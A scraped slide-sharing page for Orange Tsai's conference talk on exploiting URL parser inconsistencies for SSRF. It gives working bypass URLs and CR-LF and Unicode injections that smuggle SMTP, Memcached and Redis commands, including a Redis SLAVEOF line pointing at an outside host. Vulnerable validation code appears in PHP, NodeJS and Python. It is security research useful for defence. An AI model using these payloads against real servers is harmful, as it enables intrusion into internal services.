Downloaded 25 times
![Quick Fun Example
CR-LF Injection on HTTP protocol
Smuggling SMTP protocol over HTTP protocol
http://127.0.0.1:25/%0D%0AHELO orange.tw%0D%0AMAIL FROM…
>> GET /
<< 421 4.7.0 ubuntu Rejecting open proxy localhost [127.0.0.1]
>> HELO orange.tw
Connection closed](https://image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-12-2048.jpg)
![Quick Fun Example
CR-LF Injection on HTTPS protocol
Exploit the Unexploitable - Smuggling SMTP over TLS SNI
https://127.0.0.1□%0D%0AHELO orange.tw%0D%0AMAIL FROM…:25/
$ tcpdump -i lo -qw - tcp port 25
>> ...5./.0.,.=.j.8.2.........0...+127.0.0.1
<< 500 5.5.1 Command unrecognized: ...5./.0.,.=.j.8.2..0.+127.0.0.1
>> HELO orange.tw
<< 250 ubuntu Hello localhost [127.0.0.1], please meet you
>> MAIL FROM: <admin@orange.tw>
<< 250 2.1.0 <admin@orange.tw>... Sender ok](https://image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-19-2048.jpg)
![Consider the following PHP code
$url = 'http://' . $_GET[url];
$parsed = parse_url($url);
if ( $parsed[port] == 80 && $parsed[host] == 'google.com') {
readfile($url);
} else {
die('You Shall Not Pass');
}
Abusing URL Parsers](https://image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-25-2048.jpg)
![RFC3986
authority = [ userinfo "@" ] host [ ":" port ]
port = *DIGIT
host = IP-literal / IPv4address / reg-name
reg-name = *( unreserved / pct-encoded / sub-delims )
unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~"
sub-delims = "!" / "$" / "&" / "'" / "(" / ")" /
"*" / "+" / "," / ";" / "="
Abusing URL Parsers](https://image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-28-2048.jpg)
![GLibc NSS Features
Break the Patch of Python CVE-2016-5699
CR-LF Injection in HTTPConnection.putheader()
Space followed by CR-LF?
_is_illegal_header_value =
re.compile(rb'n(?![ t])|r(?![ tn])').search
…
if _is_illegal_header_value(values[i]):
raise ValueError('Invalid header value %r' % (values[i],))](https://image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-58-2048.jpg)
![Abusing IDNA Standard
>> "ß".toLowerCase()
"ß"
>> "ß".toUpperCase()
"SS"
>> ["ss", "SS"].indexOf("ß")
false
>> location.href = "http://wordpreß.com"
The problem relied on URL parser and URL requester use
different IDNA standard](https://image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-62-2048.jpg)
![Abusing URL Parsers - Case Study
SSRF-Bypass tech #1
Time-of-check to Time-of-use problem
1 $url_components = @parse_url($url);
2 if(
3 !$url_components ||
4 empty($url_components['host']) ||
5 (!empty($url_components['scheme']) && !in_array($url_components['scheme'], array('http', 'https'))) ||
6 (!empty($url_components['port']) && !in_array($url_components['port'], array(80, 8080, 443)))
7 ) { return false; }
8
9 $addresses = gethostbynamel($url_components['host']);
10 if($addresses) {
11 // check addresses not in disallowed_remote_addresses
12 }
13
14 $ch = curl_init();
15 curl_setopt($ch, CURLOPT_URL, $url);
16 curl_exec($ch);](https://image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-66-2048.jpg)
![Abusing URL Parsers - Case Study
SSRF-Bypass tech #2
The inconsistency between DNS checker and URL requester
There is no IDNA converter in gethostbynamel(), but cURL has
1 $url = 'http://ß.orange.tw/'; // 127.0.0.1
2
3 $host = parse_url($url)[host];
4 $addresses = gethostbynamel($host); // bool(false)
5 if ($address) {
6 // check if address in white-list
7 }
8
9 $ch = curl_init();
10 curl_setopt($ch, CURLOPT_URL, $url);
11 curl_exec($ch);](https://image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-68-2048.jpg)
![Abusing URL Parsers - Case Study
SSRF-Bypass tech #3
The inconsistency between URL parser and URL requester
Fixed in PHP 7.0.13
…127.0.0.1:11211 fetched
$url = 'http://127.0.0.1:11211#@google.com:80/';
$parsed = parse_url($url);
var_dump($parsed[host]); // string(10) "google.com"
var_dump($parsed[port]); // int(80)
curl($url);](https://image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-69-2048.jpg)
![Abusing URL Parsers - Case Study
SSRF-Bypass tech #3
The inconsistency between URL parser and URL requester
Fixed in cURL 7.54 (The version of libcurl in Ubuntu 17.04 is still 7.52.1)
$url = 'http://foo@127.0.0.1:11211@google.com:80/';
$parsed = parse_url($url);
var_dump($parsed[host]); // string(10) "google.com"
var_dump($parsed[port]); // int(80)
curl($url);
…127.0.0.1:11211 fetched](https://image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-70-2048.jpg)
![Abusing URL Parsers - Case Study
SSRF-Bypass tech #3
The inconsistency between URL parser and URL requester
cURL won't fix :)
$url = 'http://foo@127.0.0.1 @google.com:11211/';
$parsed = parse_url($url);
var_dump($parsed[host]); // string(10) "google.com"
var_dump($parsed[port]); // int(11211)
curl($url);
…127.0.0.1:11211 fetched](https://image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-71-2048.jpg)
![Protocol Smuggling - Case Study
Second bug - SSRF in internal Graphite service
GitHub Enterprise uses Graphite to draw charts
Graphite is bound on 127.0.0.1:8000
url = request.GET['url']
proto, server, path, query, frag = urlsplit(url)
if query: path += '?' + query
conn = HTTPConnection(server)
conn.request('GET',path)
resp = conn.getresponse()](https://image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-77-2048.jpg)
![Quick Fun Example
CR-LF Injection on HTTP protocol
Smuggling SMTP protocol over HTTP protocol
http://127.0.0.1:25/%0D%0AHELO orange.tw%0D%0AMAIL FROM…
>> GET /
<< 421 4.7.0 ubuntu Rejecting open proxy localhost [127.0.0.1]
>> HELO orange.tw
Connection closed](https://crownmelresort.com/image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-12-2048.jpg)
![Quick Fun Example
CR-LF Injection on HTTPS protocol
Exploit the Unexploitable - Smuggling SMTP over TLS SNI
https://127.0.0.1□%0D%0AHELO orange.tw%0D%0AMAIL FROM…:25/
$ tcpdump -i lo -qw - tcp port 25
>> ...5./.0.,.=.j.8.2.........0...+127.0.0.1
<< 500 5.5.1 Command unrecognized: ...5./.0.,.=.j.8.2..0.+127.0.0.1
>> HELO orange.tw
<< 250 ubuntu Hello localhost [127.0.0.1], please meet you
>> MAIL FROM: <admin@orange.tw>
<< 250 2.1.0 <admin@orange.tw>... Sender ok](https://crownmelresort.com/image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-19-2048.jpg)
![Consider the following PHP code
$url = 'http://' . $_GET[url];
$parsed = parse_url($url);
if ( $parsed[port] == 80 && $parsed[host] == 'google.com') {
readfile($url);
} else {
die('You Shall Not Pass');
}
Abusing URL Parsers](https://crownmelresort.com/image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-25-2048.jpg)
![RFC3986
authority = [ userinfo "@" ] host [ ":" port ]
port = *DIGIT
host = IP-literal / IPv4address / reg-name
reg-name = *( unreserved / pct-encoded / sub-delims )
unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~"
sub-delims = "!" / "$" / "&" / "'" / "(" / ")" /
"*" / "+" / "," / ";" / "="
Abusing URL Parsers](https://crownmelresort.com/image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-28-2048.jpg)
![GLibc NSS Features
Break the Patch of Python CVE-2016-5699
CR-LF Injection in HTTPConnection.putheader()
Space followed by CR-LF?
_is_illegal_header_value =
re.compile(rb'n(?![ t])|r(?![ tn])').search
…
if _is_illegal_header_value(values[i]):
raise ValueError('Invalid header value %r' % (values[i],))](https://crownmelresort.com/image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-58-2048.jpg)
![Abusing IDNA Standard
>> "ß".toLowerCase()
"ß"
>> "ß".toUpperCase()
"SS"
>> ["ss", "SS"].indexOf("ß")
false
>> location.href = "http://wordpreß.com"
The problem relied on URL parser and URL requester use
different IDNA standard](https://crownmelresort.com/image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-62-2048.jpg)
![Abusing URL Parsers - Case Study
SSRF-Bypass tech #1
Time-of-check to Time-of-use problem
1 $url_components = @parse_url($url);
2 if(
3 !$url_components ||
4 empty($url_components['host']) ||
5 (!empty($url_components['scheme']) && !in_array($url_components['scheme'], array('http', 'https'))) ||
6 (!empty($url_components['port']) && !in_array($url_components['port'], array(80, 8080, 443)))
7 ) { return false; }
8
9 $addresses = gethostbynamel($url_components['host']);
10 if($addresses) {
11 // check addresses not in disallowed_remote_addresses
12 }
13
14 $ch = curl_init();
15 curl_setopt($ch, CURLOPT_URL, $url);
16 curl_exec($ch);](https://crownmelresort.com/image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-66-2048.jpg)
![Abusing URL Parsers - Case Study
SSRF-Bypass tech #2
The inconsistency between DNS checker and URL requester
There is no IDNA converter in gethostbynamel(), but cURL has
1 $url = 'http://ß.orange.tw/'; // 127.0.0.1
2
3 $host = parse_url($url)[host];
4 $addresses = gethostbynamel($host); // bool(false)
5 if ($address) {
6 // check if address in white-list
7 }
8
9 $ch = curl_init();
10 curl_setopt($ch, CURLOPT_URL, $url);
11 curl_exec($ch);](https://crownmelresort.com/image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-68-2048.jpg)
![Abusing URL Parsers - Case Study
SSRF-Bypass tech #3
The inconsistency between URL parser and URL requester
Fixed in PHP 7.0.13
…127.0.0.1:11211 fetched
$url = 'http://127.0.0.1:11211#@google.com:80/';
$parsed = parse_url($url);
var_dump($parsed[host]); // string(10) "google.com"
var_dump($parsed[port]); // int(80)
curl($url);](https://crownmelresort.com/image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-69-2048.jpg)
![Abusing URL Parsers - Case Study
SSRF-Bypass tech #3
The inconsistency between URL parser and URL requester
Fixed in cURL 7.54 (The version of libcurl in Ubuntu 17.04 is still 7.52.1)
$url = 'http://foo@127.0.0.1:11211@google.com:80/';
$parsed = parse_url($url);
var_dump($parsed[host]); // string(10) "google.com"
var_dump($parsed[port]); // int(80)
curl($url);
…127.0.0.1:11211 fetched](https://crownmelresort.com/image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-70-2048.jpg)
![Abusing URL Parsers - Case Study
SSRF-Bypass tech #3
The inconsistency between URL parser and URL requester
cURL won't fix :)
$url = 'http://foo@127.0.0.1 @google.com:11211/';
$parsed = parse_url($url);
var_dump($parsed[host]); // string(10) "google.com"
var_dump($parsed[port]); // int(11211)
curl($url);
…127.0.0.1:11211 fetched](https://crownmelresort.com/image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-71-2048.jpg)
![Protocol Smuggling - Case Study
Second bug - SSRF in internal Graphite service
GitHub Enterprise uses Graphite to draw charts
Graphite is bound on 127.0.0.1:8000
url = request.GET['url']
proto, server, path, query, frag = urlsplit(url)
if query: path += '?' + query
conn = HTTPConnection(server)
conn.request('GET',path)
resp = conn.getresponse()](https://crownmelresort.com/image.slidesharecdn.com/d1-t2-2orangetsai-171223155841/75/A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages-by-Orange-Tsai-77-2048.jpg)
Uploaded byCODE BLUE
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! by Orange Tsai
The document discusses the exploitation of Server-Side Request Forgery (SSRF) vulnerabilities in various programming languages, highlighting URL parser inconsistencies and providing case studies and demonstrations of potential attacks. It covers issues like CR-LF injection, protocol smuggling, and the inconsistency between URL standards across different programming environments. The speaker, Orange Tsai, emphasizes the need for better understanding and mitigation strategies to address these vulnerabilities.
More Related Content
Similar to A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! by Orange Tsai
![[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...](https://cdn.slidesharecdn.com/ss_thumbnails/d1t1s08takahiroharuyamac2scan-230101090416-eee10a0a-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...](https://cdn.slidesharecdn.com/ss_thumbnails/d1t1s07tomonagamasubuchifightagainstmalwaredevelopmentlifecycle2022-10-1806-230101090047-9ab922cd-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] Tales of 5G hacking by Karsten Nohl](https://cdn.slidesharecdn.com/ss_thumbnails/d2t1s09221127-230103071757-420d7b85-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...](https://cdn.slidesharecdn.com/ss_thumbnails/d2t1s04zih-cingliaoyu-tungchnagclouddragonscredentialfactoryispoweringupitsespionageactivitiesagains-230102085356-8e46661b-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...](https://cdn.slidesharecdn.com/ss_thumbnails/anjieyangyourprintercodebluefortranslator-230103071138-8fcd3032-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...](https://cdn.slidesharecdn.com/ss_thumbnails/d2t2s052022-10-28-dfirandthreathuntingwithwindowseventlogszachmathisversion3-230103072306-eb57bdc0-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也](https://cdn.slidesharecdn.com/ss_thumbnails/d1t1s09yutawhoisthemalgopherjapanese1-230102082553-e0b239bb-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...](https://cdn.slidesharecdn.com/ss_thumbnails/d1t2s05u25yuumatakienkentarovar5-230102092618-bbf74898-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...](https://cdn.slidesharecdn.com/ss_thumbnails/d1t1s09yutawhoisthemalgopherenglishesix1-230102083158-ba91a7f7-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka](https://cdn.slidesharecdn.com/ss_thumbnails/d1t2s04vladislavhrckaunderthehoodofwslinksvirtualmachinejapanesemachinetranslation-230102091457-ae9568be-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...](https://cdn.slidesharecdn.com/ss_thumbnails/d1t2s04vladislavhrckaunderthehoodofwslinksvirtualmachine-230102091156-e3c59f0e-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...](https://cdn.slidesharecdn.com/ss_thumbnails/codeblue2022chechangsilviayeh-230102084414-c1570bd5-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...](https://cdn.slidesharecdn.com/ss_thumbnails/d2t1s07allanfriedmanen-230103060535-324b96bf-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之](https://cdn.slidesharecdn.com/ss_thumbnails/d2t1s07hiroyukiitabashijp-230103063336-b5b21552-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo](https://cdn.slidesharecdn.com/ss_thumbnails/d2t1s07lorenzopupilojp-230103061253-df49295c-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman](https://cdn.slidesharecdn.com/ss_thumbnails/d2t1s07allanfriedmanjp-230103060017-24438771-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...](https://cdn.slidesharecdn.com/ss_thumbnails/d2t1s07hiroyukiitabashien-230103064031-868ff2ae-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫](https://cdn.slidesharecdn.com/ss_thumbnails/d2t1s07ikuotakahashijp-230103054428-3dbd8ee7-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...](https://cdn.slidesharecdn.com/ss_thumbnails/d2t1s07ikuotakahashien-230103055145-37529240-thumbnail.jpg?width=640&height=640&fit=bounds)
![[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...](https://cdn.slidesharecdn.com/ss_thumbnails/d2t1s07lorenzopupiloen-230103062123-07ea5347-thumbnail.jpg?width=640&height=640&fit=bounds)
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! by Orange Tsai
- 1. A New Eraof SSRF - Exploiting URL Parser in Trending Programming Languages! Orange Tsai
- 2.
- 3. The most professionalred team in Taiwan About Orange Tsai
- 4. The largest hackerconference in Taiwan founded by chrO.ot About Orange Tsai
- 5. Speaker - Speakerat several security conferences Black Hat USA, DEFCON, HITB, HITCON, WooYun, AVTokyo CTFer - CTFs we won champions / in finalists (as team HITCON) DEFCON, Codegate, Boston Key Party, HITB, Seccon, 0CTF, WCTF Bounty Hunter - Vendors I have found Remote Code Execution Facebook, GitHub, Uber, Apple, Yahoo, Imgur About Orange Tsai
- 6. Agenda Introduction Make SSRF greatagain Issues that lead to SSRF-Bypass Issues that lead to protocol smuggling Case studies and Demos Mitigations
- 7. What is SSRF? ServerSide Request Forgery Bypass Firewall, Touch Intranet Compromise Internal services Struts2 Redis Elastic
- 8. Protocol Smuggling inSSRF Make SSRF more powerful Protocols that are suitable to smuggle HTTP based protocol Elastic, CouchDB, Mongodb, Docker Text-based protocol FTP, SMTP, Redis, Memcached
- 9. Quick Fun Example http://1.1.1.1&@2.2.2.2# @3.3.3.3/
- 10.
- 11. Python is soHard
- 12. Quick Fun Example CR-LFInjection on HTTP protocol Smuggling SMTP protocol over HTTP protocol http://127.0.0.1:25/%0D%0AHELO orange.tw%0D%0AMAIL FROM… >> GET / << 421 4.7.0 ubuntu Rejecting open proxy localhost [127.0.0.1] >> HELO orange.tw Connection closed
- 13. SMTP Hates HTTPProtocol It Seems Unexploitable
- 14. Gopher Is Good WhatIf There Is No Gopher Support?
- 15. HTTPS What Won't BeEncrypted in a SSL Handshake?
- 16. Quick Fun Example https://127.0.0.1□%0D%0AHELO□orange.tw%0D%0AMAIL□FROM…:25/ $tcpdump -i lo -qw - tcp port 25 | xxd 000001b0: 009c 0035 002f c030 c02c 003d 006a 0038 ...5./.0.,.=.j.8 000001c0: 0032 00ff 0100 0092 0000 0030 002e 0000 .2.........0.... 000001d0: 2b31 3237 2e30 2e30 2e31 200d 0a48 454c +127.0.0.1 ..HEL 000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149 O orange. tw..MAI 000001f0: 4c20 4652 4f4d 2e2e 2e0d 0a11 000b 0004 L FROM.......... 00000200: 0300 0102 000a 001c 001a 0017 0019 001c ................ CR-LF Injection on HTTPS protocol Exploit the Unexploitable - Smuggling SMTP over TLS SNI
- 17. Quick Fun Example CR-LFInjection on HTTPS protocol Exploit the Unexploitable - Smuggling SMTP over TLS SNI https://127.0.0.1□%0D%0AHELO□orange.tw%0D%0AMAIL□FROM…:25/ $ tcpdump -i lo -qw - tcp port 25 | xxd 000001b0: 009c 0035 002f c030 c02c 003d 006a 0038 ...5./.0.,.=.j.8 000001c0: 0032 00ff 0100 0092 0000 0030 002e 0000 .2.........0.... 000001d0: 2b31 3237 2e30 2e30 2e31 200d 0a48 454c +127.0.0.1 ..HEL 000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149 O orange.tw..MAI 000001f0: 4c20 4652 4f4d 2e2e 2e0d 0a11 000b 0004 L FROM.......... 00000200: 0300 0102 000a 001c 001a 0017 0019 001c ................
- 18. Quick Fun Example CR-LFInjection on HTTPS protocol Exploit the Unexploitable - Smuggling SMTP over TLS SNI https://127.0.0.1□%0D%0AHELO orange.tw%0D%0AMAIL FROM…:25/ $ tcpdump -i lo -qw - tcp port 25 | xxd 000001b0: 009c 0035 002f c030 c02c 003d 006a 0038 ...5./.0.,.=.j.8 000001c0: 0032 00ff 0100 0092 0000 0030 002e 0000 .2.........0.... 000001d0: 2b31 3237 2e30 2e30 2e31 200d 0a48 454c +127.0.0.1 ..HEL 000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149 O orange.tw..MAI 000001f0: 4c20 4652 4f4d 2e2e 2e0d 0a11 000b 0004 L FROM.......... 00000200: 0300 0102 000a 001c 001a 0017 0019 001c ................
- 19. Quick Fun Example CR-LFInjection on HTTPS protocol Exploit the Unexploitable - Smuggling SMTP over TLS SNI https://127.0.0.1□%0D%0AHELO orange.tw%0D%0AMAIL FROM…:25/ $ tcpdump -i lo -qw - tcp port 25 >> ...5./.0.,.=.j.8.2.........0...+127.0.0.1 << 500 5.5.1 Command unrecognized: ...5./.0.,.=.j.8.2..0.+127.0.0.1 >> HELO orange.tw << 250 ubuntu Hello localhost [127.0.0.1], please meet you >> MAIL FROM: <admin@orange.tw> << 250 2.1.0 <admin@orange.tw>... Sender ok
- 20. Make SSRF GreatAgain
- 21. URL Parsing Issues It'sall about the inconsistency between URL parser and requester Why validating a URL is hard? 1. Specification in RFC2396, RFC3986 but just SPEC 2. WHATWG defined a contemporary implementation based on RFC but different languages still have their own implementations
- 22.
- 23. URL Components(RFC 3986) foo://example.com:8042/over/there?name=bar#nose (Weonly care about HTTP HTTPS) (It's complicated) (I don't care) (I don't care) scheme authority (It's complicated) path fragment query
- 24. Big Picture Libraries/Vulns CR-LF InjectionURL Parsing Path Host SNI Port Injection Host Injection Path Injection Python httplib 💀 💀 💀 Python urllib 💀 💀 💀 Python urllib2 💀 💀 Ruby Net::HTTP 💀 💀 💀 Java net.URL 💀 💀 Perl LWP 💀 💀 NodeJS http 💀 💀 PHP http_wrapper 💀 💀 Wget 💀 💀 cURL 💀 💀
- 25. Consider the followingPHP code $url = 'http://' . $_GET[url]; $parsed = parse_url($url); if ( $parsed[port] == 80 && $parsed[host] == 'google.com') { readfile($url); } else { die('You Shall Not Pass'); } Abusing URL Parsers
- 26.
- 27. http://127.0.0.1:11211:80/ PHP readfile Perl LWP PHPparse_url Perl URI Abusing URL Parsers
- 28. RFC3986 authority = [userinfo "@" ] host [ ":" port ] port = *DIGIT host = IP-literal / IPv4address / reg-name reg-name = *( unreserved / pct-encoded / sub-delims ) unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~" sub-delims = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "=" Abusing URL Parsers
- 29.
- 30.
- 31. Several programing languagessuffered from this issue cURL, PHP, Python RFC3968 section 3.2 The authority component is preceded by a double slash ("//") and is terminated by the next slash ("/"), question mark ("?"), or number sign ("#") character, or by the end of the URI Abusing URL Parsers
- 32.
- 33.
- 34. http://foo@evil.com:80@google.com/ cURL libcurl NodeJS URL Perl URI Gonet/url PHP parse_url Ruby addressable Abusing URL Parsers
- 35. Abusing URL Parsers cURL/ libcurl PHP parse_url 💀 Perl URI 💀 Ruby uri Ruby addressable 💀 NodeJS url 💀 Java net.URL Python urlparse Go net/url 💀
- 36. Report the bugto cURL team and get a patch quickly Bypass the patch with a space Abusing URL Parsers http://foo@127.0.0.1 @google.com/
- 37. Report Again But… "curldoesn't verify that the URL is 100% syntactically correct. It is instead documented to work with URLs and sort of assumes that you pass it correct input"
- 38. Won't Fix But previouspatch still applied on cURL 7.54.0
- 39. Consider the followingNodeJS code NodeJS Unicode Failure var base = "http://orange.tw/sandbox/"; var path = req.query.path; if (path.indexOf("..") == -1) { http.get(base + path, callback); }
- 40.
- 41.
- 42.
- 43.
- 44. / is new../(in NodeJS HTTP) (U+FF2E) Full width Latin capital letter N
- 45.
- 46. NodeJS Unicode Failure HTTPmodule prevents requests from CR-LF Injection Encode the New-lines as URL encoding http://127.0.0.1:6379/rnSLAVEOF orange.tw 6379rn $ nc -vvlp 6379 >> GET /%0D%0ASLAVEOF%20orange.tw%206379%0D%0A HTTP/1.1 >> Host: 127.0.0.1:6379 >> Connection: close
- 47. NodeJS Unicode Failure HTTPmodule prevents requests from CR-LF Injection Break the protections by Unicode U+FF0D U+FF0A http://127.0.0.1:6379/-*SLAVEOF@orange.tw@6379-* $ nc -vvlp 6379 >> GET / >> SLAVEOF orange.tw 6379 >> HTTP/1.1 >> Host: 127.0.0.1:6379 >> Connection: close
- 48. GLibc NSS Features InGlibc source code file resolv/ns_name.c#ns_name_pton() /*% * Convert an ascii string into an encoded domain name as per RFC1035. */ int ns_name_pton(const char *src, u_char *dst, size_t dstsiz)
- 49. GLibc NSS Features RFC1035- Decimal support in gethostbyname() void main(int argc, char **argv) { char *host = "or097nge.tw"; struct in_addr *addr = gethostbyname(host)->h_addr; printf("%sn", inet_ntoa(*addr)); } …50.116.8.239
- 50. GLibc NSS Features RFC1035- Decimal support in gethostbyname() >>> import socket >>> host = 'orange.tw' >>> print host orange.tw >>> socket.gethostbyname(host) '50.116.8.239'
- 51. GLibc NSS Features voidmain(int argc, char **argv) { struct addrinfo *res; getaddrinfo("127.0.0.1 foo", NULL, NULL, &res); struct sockaddr_in *ipv4 = (struct sockaddr_in *)res->ai_addr; printf("%sn", inet_ntoa(ipv4->sin_addr)); } …127.0.0.1 Linux getaddrinfo() strip trailing rubbish followed by whitespaces
- 52. GLibc NSS Features Linuxgetaddrinfo() strip trailing rubbish followed by whitespaces Lots of implementations relied on getaddrinfo() >>> import socket >>> socket.gethostbyname("127.0.0.1rnfoo") '127.0.0.1'
- 53. GLibc NSS Features ExploitGlibc NSS features on URL Parsing http://127.0.0.1tfoo.google.com http://127.0.0.1%09foo.google.com http://127.0.0.1%2509foo.google.com
- 54. GLibc NSS Features ExploitGlibc NSS features on URL Parsing Why this works? Some library implementations decode the URL twice… http://127.0.0.1%2509foo.google.com
- 55. Exploit Glibc NSSfeatures on Protocol Smuggling HTTP protocol 1.1 required a host header $ curl -vvv http://I-am-a-very-very-weird-domain.com >> GET / HTTP/1.1 >> Host: I-am-a-very-very-weird-domain.com >> User-Agent: curl/7.53.1 >> Accept: */* GLibc NSS Features
- 56. GLibc NSS Features ExploitGlibc NSS features on Protocol Smuggling HTTP protocol 1.1 required a host header http://127.0.0.1rnSLAVEOF orange.tw 6379rn:6379/ $ nc -vvlp 6379 >> GET / HTTP/1.1 >> Host: 127.0.0.1 >> SLAVEOF orange.tw 6379 >> :6379 >> Connection: close
- 57. GLibc NSS Features https://127.0.0.1rnSETfoo 0 60 5rn:443/ $ nc -vvlp 443 >> ..=5</.Aih9876.'. #...$...?...).%..g@?>3210...EDCB.. >> .....5'%"127.0.0.1 >> SET foo 0 60 5 Exploit Glibc NSS features on Protocol Smuggling SNI Injection - Embed hostname in SSL Client Hello Simply replace HTTP with HTTPS
- 58. GLibc NSS Features Breakthe Patch of Python CVE-2016-5699 CR-LF Injection in HTTPConnection.putheader() Space followed by CR-LF? _is_illegal_header_value = re.compile(rb'n(?![ t])|r(?![ tn])').search … if _is_illegal_header_value(values[i]): raise ValueError('Invalid header value %r' % (values[i],))
